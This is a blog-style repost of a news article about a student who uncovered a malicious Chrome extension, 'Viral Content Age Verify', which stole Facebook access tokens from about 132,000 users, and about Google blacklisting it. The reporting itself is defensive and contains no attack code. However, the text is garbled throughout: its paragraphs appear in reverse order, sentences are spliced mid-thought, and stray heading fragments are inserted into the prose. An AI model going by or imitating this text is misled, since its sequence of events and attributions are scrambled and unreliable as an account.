![]() ![]()
“The fact is that the current malware detection on the Chrome Webstore is a joke,” he wrote, “Currently, all it takes to get around it is to download the payload on installation rather than shipping with it. Kjaer commended Google’s move but still blasted the company for its approach to Chrome extension security. Will Harris, a member of Chrome’s Security team told Kjaer that when extensions are blacklisted they are also automatically removed from the user’s computers as Extensions that are blacklisted in the Chrome web store do get automatically removed from all users who have them installed. ![]() Google chrome store rabbit verification#Google did not immediately respond to Threatpost’s request for comment but the company did reply to Kjaer, and confirmed it blacklisted the Age Verification extensions. A drop in the ocean compared to the size of the Internet, but still a decent catch if you ask me,” Kjaer wrote. Still, that’s a patched security vulnerability on 130,000 machines at once. “All the machines technically remain infected, but the malware will be defused. Both Google and the hosting firm took immediate action, taking down the servers and blacklisting the extensions. Kjaer notified both Google and the C2 servers’ hosting company, DigitalOcean, of the malware. Once credentials are collected, he observed, the malware sends back to the C2 information identifying the infected machine, what version of the age verification extension you are running and whether or not you are currently logged into Facebook.Īll together Kjaer said there were nine identical variations of the Viral Content Age Verify extensions on the Google Chrome Webstore with a cumulative total of 132,265 users. While Kjaer said the malware functions that he documented were Facebook specific, he noted that the credential stealing function also applied to YouTube. ![]() The first step for malware authors and a hijacked Facebook account was to Like a Facebook page called a page called VVideosss. Post-script execution, the C2’s instructions were to steal access tokens (the equivalent of having your username and password) for Facebook so the malware authors can control your Facebook account. “The first URL is to get instructions from a server (C2), and the second one is to report back to it,” he wrote. However, the install.js script fetches the malware payload from two hard-coded URLs. Both background.js and query-string.js scripts are innocuous. Google chrome store rabbit install#As soon as he did he was asked to verify his age via by installing the Viral Content Age Verify Chrome browser extension.īy agreeing to install the extension, Kjaer watched as a metadata file called manifest.json began to run through three scripts (background.js, query-string.js and install.js). Going down the rabbit hole began with clicking Like on one of his Facebook friend’s “semi-raunchy” Liked item. ![]() That even includes reading and leaking your credit card information, if you ever are to type that in,” Kjaer describes. The malware-laced extension called “Viral Content Age Verify” allowed a third-party to “read and change all your data on the websites you visit” and potentially “read your emails, steal all your login credentials, have you DDoS someone, mine Bitcoin, seed pirated content… You name it. What he found was what he called a “glaring security hole” in the Google Chrome Webstore that allowed malware authors to infect Chrome browsers via a bogus age verification extension. “Intrigued, I decided to go down the rabbit hole and see what this was all about,” wrote Kjaer, a 19-year-old computer science student at Swiss Federal Institute of Technology in Switzerland, in a blog post Monday. Ever wonder how your mild-mannered friend’s Facebook feed suddenly got packed with lewd clickbait? That’s the question Maxime Kjaer was determined to answer when he noticed a friend’s Facebook feed peppered with Likes for sketchy link bait such as “Basic Kissing Tips”. ![]()
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |